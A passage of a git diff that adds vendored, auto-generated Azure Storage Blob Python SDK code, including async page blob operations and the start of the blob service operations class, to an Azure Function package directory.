server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_diff_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + prevsnapshot=prevsnapshot, + prev_snapshot_url=prev_snapshot_url, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges_diff.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges_diff.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def resize( # pylint: disable=inconsistent-return-statements + self, + blob_content_length: int, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """Resize the Blob. + + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_resize_request( + url=self._config.url, + comp=comp, + version=self._config.version, + blob_content_length=blob_content_length, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.resize.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + resize.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def update_sequence_number( # pylint: disable=inconsistent-return-statements + self, + sequence_number_action: Union[str, "_models.SequenceNumberActionType"], + timeout: Optional[int] = None, + blob_sequence_number: Optional[int] = 0, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """Update the sequence number of the blob. + + :param sequence_number_action: Required if the x-ms-blob-sequence-number header is set for the + request. This property applies to page blobs only. This property indicates how the service + should modify the blob's sequence number. + :type sequence_number_action: str or ~azure.storage.blob.models.SequenceNumberActionType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_update_sequence_number_request( + url=self._config.url, + comp=comp, + version=self._config.version, + sequence_number_action=sequence_number_action, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + template_url=self.update_sequence_number.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + update_sequence_number.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def copy_incremental( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Copy Incremental operation copies a snapshot of the source page blob to a destination page + blob. The snapshot is copied such that only the differential changes between the previously + copied snapshot are transferred to the destination. The copied snapshots are complete copies of + the original snapshot and can be read or copied from as usual. This API is supported since REST + version 2016-05-31. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "incrementalcopy". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "incrementalcopy") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_copy_incremental_request( + url=self._config.url, + comp=comp, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.copy_incremental.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_incremental.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py new file mode 100644 index 0000000..b898f74 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py @@ -0,0 +1,725 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._service_operations import build_filter_blobs_request, build_get_account_info_request, build_get_properties_request, build_get_statistics_request, build_get_user_delegation_key_request, build_list_containers_segment_request, build_set_properties_request, build_submit_batch_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class ServiceOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`service` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def set_properties( # pylint: disable=inconsistent-return-statements + self, + storage_service_properties: "_models.StorageServiceProperties", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """Sets properties for a storage account's Blob service endpoint, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param storage_service_properties: The StorageService properties. + :type storage_service_properties: ~azure.storage.blob.models.StorageServiceProperties + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(storage_service_properties, 'StorageServiceProperties', is_xml=True) + + request = build_set_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_properties( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.StorageServiceProperties": + """gets the properties of a storage account's Blob service, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceProperties, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceProperties + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceProperties"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('StorageServiceProperties', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_statistics( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.StorageServiceStats": + """Retrieves statistics related to replication for the Blob service. It is only available on the + secondary location endpoint when read-access geo-redundant replication is enabled for the + storage account. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "stats". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceStats, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceStats + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceStats"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + + + request = build_get_statistics_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_statistics.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('StorageServiceStats', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_statistics.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def list_containers_segment( + self, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListContainersSegmentResponse": + """The List Containers Segment operation returns a list of the containers under the specified + account. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify that the container's metadata be returned as + part of the response body. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListContainersIncludeType] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListContainersSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListContainersSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListContainersSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_containers_segment_request( + url=self._config.url, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_containers_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('ListContainersSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_containers_segment.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_user_delegation_key( + self, + key_info: "_models.KeyInfo", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.UserDelegationKey": + """Retrieves a user delegation key for the Blob service. This is only a valid operation when using + bearer token authentication. + + :param key_info: Key information. + :type key_info: ~azure.storage.blob.models.KeyInfo + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "userdelegationkey". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: UserDelegationKey, or the result of cls(response) + :rtype: ~azure.storage.blob.models.UserDelegationKey + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.UserDelegationKey"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(key_info, 'KeyInfo', is_xml=True) + + request = build_get_user_delegation_key_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_user_delegation_key.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('UserDelegationKey', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_user_delegation_key.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the 